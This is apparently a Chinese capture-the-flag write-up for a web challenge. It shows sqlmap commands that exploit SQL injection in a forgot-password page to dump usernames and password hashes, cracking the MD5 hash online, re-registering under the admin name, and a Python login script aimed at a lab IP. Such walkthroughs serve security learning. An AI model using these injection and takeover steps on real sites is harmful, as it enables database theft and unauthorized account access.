题目:
解题思路:
注入点在忘记密码处,使用sqlmap一把梭
sqlmap -r 1.txt --dbs --batch
sqlmap -r 1.txt --dbs --batch -D cetc004 -T user -C 'username,password' --dump
直接解密md5,解密网址:https://www.somd5.com/
然后使用c3tlwDmIn23登录,即可获得flag
注:如果md5无法解密还可使用如下方法
1、利用可以重复注册的漏洞,测试方法,使用c3tlwDmIn23作为用户名重新注册,设置自己知道的密码,然后登陆,即可获得flag
2、网上还有一种,使用py脚本,但目前无法显示flag了,只有正确的密码才可以。经过抓包发现他不是前端md5加密,再和后端数据库中加密后的密码进行比对;有可能是后端md5加密,然后再进行比对
贴一下代码:如果以后有类似题目,可以参考
import requests
url = 'http://159.138.137.79:61667/login.php'
username = 'c3tlwDmIn23'
password = '2f8667f381ff50ced6a3edc259260ba9'
data = {
'username':username,
'password':password}
req = requests.post(url,data=data)
req.encoding='utf-8'
print (req.text)